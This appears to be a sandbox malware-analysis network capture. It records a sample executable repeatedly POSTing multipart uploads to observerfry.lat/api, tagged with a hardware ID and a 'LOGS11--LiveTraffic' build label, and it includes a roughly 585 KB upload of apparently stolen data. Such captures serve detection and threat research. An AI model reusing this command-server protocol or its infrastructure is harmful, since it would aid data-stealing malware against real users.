                                                                                                                                              Data Ascii: irvwypR24K9PjIYx7muacFLn9rh098hRS7H24WhYvzBZ6/aKkfbw/50clCEq7xupyXrgrOGi38AIMvtxrwuqJQ/0fZ/HJWK+nBxFsn9sGnBIo2QvofEOVsgmszOoSXkrGev0CpH27H+aG5RkazyD5ocy4K6l5kxWXGPgp3lbOSXOK+QOk3A0a4xMASY86Zpj1uV0vrAmjFPcc7MyLYhqpA7/c5pCZjDw1hFW4q4sS6nJeyLpI2HdikPvtPCp2CC


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              2192.168.2.749703172.67.199.72443424C:\Users\user\Desktop\tTGxYWtjG5.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-24 07:50:41 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: multipart/form-data; boundary=XGZGWN69Z4L
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 12808
                                                                                                                                              Host: observerfry.lat
                                                                                                                                              2024-12-24 07:50:41 UTC12808OUTData Raw: 2d 2d 58 47 5a 47 57 4e 36 39 5a 34 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 38 33 33 45 32 39 32 38 35 37 43 34 38 44 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 58 47 5a 47 57 4e 36 39 5a 34 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 47 5a 47 57 4e 36 39 5a 34 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 58 47 5a 47 57 4e 36 39 5a 34 4c
                                                                                                                                              Data Ascii: --XGZGWN69Z4LContent-Disposition: form-data; name="hwid"C4833E292857C48DBEBA0C6A975F1733--XGZGWN69Z4LContent-Disposition: form-data; name="pid"2--XGZGWN69Z4LContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--XGZGWN69Z4L
                                                                                                                                              2024-12-24 07:50:42 UTC1126INHTTP/1.1 200 OK
                                                                                                                                              Date: Tue, 24 Dec 2024 07:50:42 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=58m9381hn4r7neienj4p0jjk51; expires=Sat, 19 Apr 2025 01:37:21 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uWFwQYPEBEC0ZIyQM4WmoxYDgkRaJvjjEa%2B8DNnxo2%2BiZOOij16pFnTHF7ch4GQ7rdmkBEdIFn2suJi7wxGb4WrdNmi0IWFDsx4JPvAYG0tkVAfZI864nzXmaPmeWJCV86Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f6f007fbc950f68-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1520&rtt_var=581&sent=13&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13740&delivery_rate=1863433&cwnd=238&unsent_bytes=0&cid=317a382093fbe6d5&ts=1016&x=0"
                                                                                                                                              2024-12-24 07:50:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                              2024-12-24 07:50:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              3192.168.2.749709172.67.199.72443424C:\Users\user\Desktop\tTGxYWtjG5.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-24 07:50:44 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: multipart/form-data; boundary=6AMRFSH27T1LETNRW
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 15076
                                                                                                                                              Host: observerfry.lat
                                                                                                                                              2024-12-24 07:50:44 UTC15076OUTData Raw: 2d 2d 36 41 4d 52 46 53 48 32 37 54 31 4c 45 54 4e 52 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 38 33 33 45 32 39 32 38 35 37 43 34 38 44 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 36 41 4d 52 46 53 48 32 37 54 31 4c 45 54 4e 52 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 41 4d 52 46 53 48 32 37 54 31 4c 45 54 4e 52 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                              Data Ascii: --6AMRFSH27T1LETNRWContent-Disposition: form-data; name="hwid"C4833E292857C48DBEBA0C6A975F1733--6AMRFSH27T1LETNRWContent-Disposition: form-data; name="pid"2--6AMRFSH27T1LETNRWContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                              2024-12-24 07:50:44 UTC1129INHTTP/1.1 200 OK
                                                                                                                                              Date: Tue, 24 Dec 2024 07:50:44 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=19ugjaq8rrh93mj1bu4nfglsg7; expires=Sat, 19 Apr 2025 01:37:23 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BvQFna%2F2Yv9bAuTSTU4Gg3E2CgmNygKkiu2GYhfrRaznefsaOVH7ltQqgzkn8E2%2FqYXsJB0ZQzF8%2BXTjsg9tgA8a2HNrIHVf7trsaZg8i1rI3dPLwBEoWX431zbnqudZiVY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f6f008e1adc440e-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2212&min_rtt=2210&rtt_var=830&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16014&delivery_rate=1321266&cwnd=236&unsent_bytes=0&cid=230ac724b49e3fb7&ts=968&x=0"
                                                                                                                                              2024-12-24 07:50:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                              2024-12-24 07:50:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              4192.168.2.749715172.67.199.72443424C:\Users\user\Desktop\tTGxYWtjG5.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-24 07:50:46 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: multipart/form-data; boundary=H7PJEKSB2A4NV42C9
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 20401
                                                                                                                                              Host: observerfry.lat
                                                                                                                                              2024-12-24 07:50:46 UTC15331OUTData Raw: 2d 2d 48 37 50 4a 45 4b 53 42 32 41 34 4e 56 34 32 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 38 33 33 45 32 39 32 38 35 37 43 34 38 44 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 48 37 50 4a 45 4b 53 42 32 41 34 4e 56 34 32 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 37 50 4a 45 4b 53 42 32 41 34 4e 56 34 32 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                              Data Ascii: --H7PJEKSB2A4NV42C9Content-Disposition: form-data; name="hwid"C4833E292857C48DBEBA0C6A975F1733--H7PJEKSB2A4NV42C9Content-Disposition: form-data; name="pid"3--H7PJEKSB2A4NV42C9Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                              2024-12-24 07:50:46 UTC5070OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5
                                                                                                                                              Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/
                                                                                                                                              2024-12-24 07:50:47 UTC1126INHTTP/1.1 200 OK
                                                                                                                                              Date: Tue, 24 Dec 2024 07:50:47 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=516i3889e9cjc96j7g2sjg8gdc; expires=Sat, 19 Apr 2025 01:37:26 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3pkR6RP0q6TOnVc26Z6%2Fy4jfLvfvi2dsba1pg9JZGwaixUq1vYoFnUr%2BkPM0A6toHU7mSGCzX11U2fofxNGxpsgg3SdGdFrYRh1J1PXfPdyYjuxbUTRhIIwqO0NUadgCR6E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f6f009d2b260f9d-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1496&rtt_var=591&sent=19&recv=26&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21361&delivery_rate=1805813&cwnd=193&unsent_bytes=0&cid=27961f9ee08f907a&ts=1005&x=0"
                                                                                                                                              2024-12-24 07:50:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                              2024-12-24 07:50:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              5192.168.2.749721172.67.199.72443424C:\Users\user\Desktop\tTGxYWtjG5.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-24 07:50:49 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: multipart/form-data; boundary=L01YY37EQMF
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 1218
                                                                                                                                              Host: observerfry.lat
                                                                                                                                              2024-12-24 07:50:49 UTC1218OUTData Raw: 2d 2d 4c 30 31 59 59 33 37 45 51 4d 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 38 33 33 45 32 39 32 38 35 37 43 34 38 44 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 30 31 59 59 33 37 45 51 4d 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 30 31 59 59 33 37 45 51 4d 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4c 30 31 59 59 33 37 45 51 4d 46
                                                                                                                                              Data Ascii: --L01YY37EQMFContent-Disposition: form-data; name="hwid"C4833E292857C48DBEBA0C6A975F1733--L01YY37EQMFContent-Disposition: form-data; name="pid"1--L01YY37EQMFContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--L01YY37EQMF
                                                                                                                                              2024-12-24 07:50:50 UTC1124INHTTP/1.1 200 OK
                                                                                                                                              Date: Tue, 24 Dec 2024 07:50:49 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=hvfe68bou5j98amgjstv5uv7na; expires=Sat, 19 Apr 2025 01:37:28 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ypLqfYNagMTgm1SkyY1NlPzGOxFa1QM%2B5ejhZQioLbmJLRKDNbr6MAC74SEd0x7QJhUxH9FzFXnrFPVt1wlZNcrJwgIn6SPTN9%2FdNX2AghktvYL0PefNum5o7Mc2%2FREcUiU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f6f00af6c27efa3-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1775&rtt_var=692&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2127&delivery_rate=1551540&cwnd=114&unsent_bytes=0&cid=eccd8772e6fb56cc&ts=754&x=0"
                                                                                                                                              2024-12-24 07:50:50 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                              2024-12-24 07:50:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              6192.168.2.749735172.67.199.72443424C:\Users\user\Desktop\tTGxYWtjG5.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-24 07:50:53 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: multipart/form-data; boundary=WX12WBHD86IUKHKE1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 585769
                                                                                                                                              Host: observerfry.lat
                                                                                                                                              2024-12-24 07:50:53 UTC15331OUTData Raw: 2d 2d 57 58 31 32 57 42 48 44 38 36 49 55 4b 48 4b 45 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 38 33 33 45 32 39 32 38 35 37 43 34 38 44 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 57 58 31 32 57 42 48 44 38 36 49 55 4b 48 4b 45 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 58 31 32 57 42 48 44 38 36 49 55 4b 48 4b 45 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                              Data Ascii: --WX12WBHD86IUKHKE1Content-Disposition: form-data; name="hwid"C4833E292857C48DBEBA0C6A975F1733--WX12WBHD86IUKHKE1Content-Disposition: form-data; name="pid"1--WX12WBHD86IUKHKE1Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                              2024-12-24 07:50:53 UTC15331OUTData Raw: 42 93 aa 45 27 ac 79 3c 6a 8f e4 a3 13 a2 f6 12 db 0c 50 7a 71 5f ed 63 a2 d3 37 73 4d fd 58 82 fb 8f 9e be a8 e1 d8 c6 7d 98 5a 28 9f c1 dd ac 96 e9 c6 6b 2d c7 f0 c2 95 0a 83 4c f5 a9 b7 a5 80 32 39 ae 75 bb a2 25 d3 7a e0 c4 6a ce d9 60 6a 2d 13 0b ff e4 f8 cc 1c 2c 1f ae d9 8b 83 0b 6b aa bb aa ca 17 7f 1c 06 27 5b 0e f7 99 f6 14 5c 9d 79 75 ac ff ff 6f 03 b0 4f 2c f1 80 6f 83 67 b1 10 b7 b1 73 97 6e 31 e2 f0 37 58 5c 96 d7 fe bd c3 32 c0 1e 68 76 b8 80 52 34 68 24 93 7b 74 80 57 13 17 7c 80 a1 5b a7 8f c6 7a 27 33 0b 75 fc f6 a2 b6 1f 56 af 9c e7 82 2a 2d c2 0e e4 fe 2e 5d ca 74 19 f0 fe 98 41 e5 65 01 c0 bf d3 6d ae c5 67 98 2e 36 57 a7 c6 a4 f2 63 9e 6c 14 26 42 6f fa 95 c6 79 f3 2f 21 0c 35 bb 11 2e fe 29 a0 b9 7d 36 50 ff 81 81 cb 92 69 aa 37 66
                                                                                                                                              Data Ascii: BE'y<jPzq_c7sMX}Z(k-L29u%zj`j-,k'[\yuoO,ogsn17X\2hvR4h${tW|[z'3uV*-.]tAemg.6Wcl&Boy/!5.)}6Pi7f
                                                                                                                                              2024-12-24 07:50:53 UTC15331OUTData Raw: 5d e8 6d f4 46 bd da 08 a2 6a a6 79 1b f4 8c 0c 4a b7 5e a3 3b d4 31 c5 98 68 a0 9c 1f cf b6 88 d7 c1 63 85 c1 9d ab 50 76 63 a8 33 7c 6c 7c b2 18 11 78 2c a1 c3 36 4d d9 19 e2 ae 83 a1 ee bb 89 c2 41 ca 6d 2d 79 48 8d 5d d6 0b b5 3a f7 af d9 65 ae bf 22 2b 9e 8b d3 4e 09 52 fd 36 a0 b1 9d a5 5a 9f e0 ec cc 23 5b 64 dd 6b 1f d3 94 2d 5d 40 5f a4 00 36 12 e3 55 fa d8 6a 41 d8 90 42 d1 ae ba 6d ae ef d4 d1 21 72 bf c1 a9 0e 42 85 6f fe d7 9a 98 9b d2 d6 e8 2f cc df f7 68 e8 79 79 a1 e2 2a 9d 6e 39 7c 9d e7 e4 1d 86 b2 22 78 76 82 4b aa 60 47 df 04 e6 de 45 f5 9a 7f 0a 82 15 b0 b2 42 ad 52 91 88 0e 8b d4 4f 47 cf 1b 76 af b9 5c 8d e0 83 18 77 ae 1d a4 f2 6e 5d d9 49 0d d1 a8 70 9e b7 65 16 d0 16 cf b1 98 51 02 15 38 99 40 c6 ce b2 55 72 c5 1f 7f e7 06 8a 95
                                                                                                                                              Data Ascii: ]mFjyJ^;1hcPvc3|l|x,6MAm-yH]:e"+NR6Z#[dk-]@_6UjABm!rBo/hyy*n9|"xvK`GEBROGv\wn]IpeQ8@Ur
                                                                                                                                              2024-12-24 07:50:53 UTC15331OUTData Raw: 2f c4 98 8f bb 51 fc 1e 94 e9 51 6f 9a 6e 09 d1 e1 1d 9c 95 25 dd 29 ab 25 fa 55 c1 25 14 58 9e df 4f 4b 9a 3a b1 7b 6e a1 5e ce 2c a1 72 ec 16 29 85 56 b5 07 0c 3b 07 6d bf 5f f5 5b 09 c9 c0 17 04 c7 ae 1e 65 2f 24 cf 98 0c 10 29 b2 3c 86 cd 77 df 68 e2 18 b3 5f 76 7b d5 ea a5 04 56 41 a8 db c1 8e 02 45 7f 70 70 a2 ac c4 72 7f ce f8 ba d4 c2 d9 f1 aa e4 7e 34 e0 cc 05 d9 ad 53 d7 5a f4 6d 25 54 be d5 51 b8 f9 eb de 13 df 58 a0 41 8d 39 b7 ec ab d0 e7 76 bf 8f c2 1a c5 c0 49 cb f7 1e a7 3e 13 e7 ad 5e de 65 b5 c5 9c 37 e2 49 ba 38 41 97 0b a6 ee 0e 70 49 d2 02 eb 9a 51 ca 39 56 17 58 9b cf 58 d6 3a 3b 50 80 64 29 0d de ac 8b 7b 01 ce ba 88 ba fb fa 8f 57 29 42 b0 4f d4 7a b0 32 db 59 8f 0b 88 0e 33 5c eb 83 9a 65 b3 50 9e 72 7d 41 53 7a 96 72 55 37 37 35
                                                                                                                                              Data Ascii: /QQon%)%U%XOK:{n^,r)V;m_[e/$)<wh_v{VAEppr~4SZm%TQXA9vI>^e7I8ApIQ9VXX:;Pd){W)BOz2Y3\ePr}ASzrU775
                                                                                                                                              2024-12-24 07:50:53 UTC15331OUTData Raw: 40 c4 4c a2 42 a7 21 90 40 85 14 be ab 4f 12 c1 0c ca dc 9e 32 e9 e3 2e e2 6d 83 90 af 3d 05 a0 40 80 2c c8 00 1c 80 1f db 31 19 89 46 7c 4a 24 98 f7 83 10 95 ca 41 76 2a 3c a2 6e 40 e7 59 5e 0f 87 81 7e 4f f0 cf b5 f8 0c 71 25 65 81 78 46 4b 75 55 8b 4e 0a 04 4b 41 07 6f b3 7d d0 e0 e6 32 a2 75 db 91 b2 08 bf 33 1f 40 e1 28 72 a0 80 fe ba e2 4e 1c 62 e7 7a aa ab 0b 7a 14 31 0b 05 25 ea ca ab ae 8d ba 06 db 8d 0b 02 16 9e 4f 02 3e 88 fc 2c a4 f3 b6 20 62 c0 a6 3c 76 80 e1 d2 50 f2 d4 f4 f9 31 87 0c 48 c2 48 5c fa ac 82 fc b1 e2 7a 09 44 2a 44 b3 6e c8 24 c2 71 a9 67 7b 83 4a d5 64 55 b1 90 40 cc 25 33 fd d7 b3 ce 99 2a b2 a1 e1 fe 93 28 8b 43 62 a7 cd 8c ad 8c f7 68 b0 b6 0a 25 e9 29 6a 60 ff 70 a3 eb d6 9f 22 4a 8d 7e dd 03 6e be 3f 90 4b a3 de f8 46 9b
                                                                                                                                              Data Ascii: @LB!@O2.m=@,1F|J$Av*<n@Y^~Oq%exFKuUNKAo}2u3@(rNbzz1%O>, b<vP1HH\zD*Dn$qg{JdU@%3*(Cbh%)j`p"J~n?KF
                                                                                                                                              2024-12-24 07:50:53 UTC15331OUTData Raw: 3d 46 8c 68 a9 9a e1 5a 19 43 25 5f a4 40 49 b1 33 39 b6 e5 6e cf 0e 2b a8 90 e5 24 56 ea 9d bd 86 01 95 ff a2 a9 c9 1a 84 7a 08 68 61 37 3b f1 a7 83 8a b3 1f f9 b9 07 1d ef 2d 18 f1 e5 5f 59 5f 18 5a 78 fd a2 59 6f e5 5c 61 60 c7 23 97 ef 9f 31 19 be 47 29 92 39 d6 eb ea ad 8f 8c 59 5a 1c 11 1b 67 30 16 18 c7 94 f9 80 e1 9c bf 30 40 4c 11 07 d3 c4 02 3e 7f ce a2 ca 8d 8a 85 b1 e9 ba c4 d0 04 e4 d2 67 ef ed 59 66 a5 47 62 9c 36 9a 1a be 6c 03 ad ea 53 43 a9 14 40 3b 32 98 a7 6c 42 26 df cc 7d c8 f9 a2 04 f5 55 49 e0 e5 21 d0 3d 75 8e 7e 60 a0 d8 e9 fa 29 06 ac 9c e1 f8 f8 c0 2c 2c 6d 64 90 6e b4 40 69 61 f4 ab 8e 72 64 07 21 e6 0c 04 dc be 9c 7c 03 4b f9 fa e4 a7 36 2a fc ac a9 5d 58 58 56 d6 27 13 41 9a 25 fc 0a 51 54 6c 70 a9 d5 00 82 2e 2f 46 d6 8d a4
                                                                                                                                              Data Ascii: =FhZC%_@I39n+$Vzha7;-_Y_ZxYo\a`#1G)9YZg00@L>gYfGb6lSC@;2lB&}UI!=u~`),,mdn@iard!|K6*]XXV'A%QTlp./F
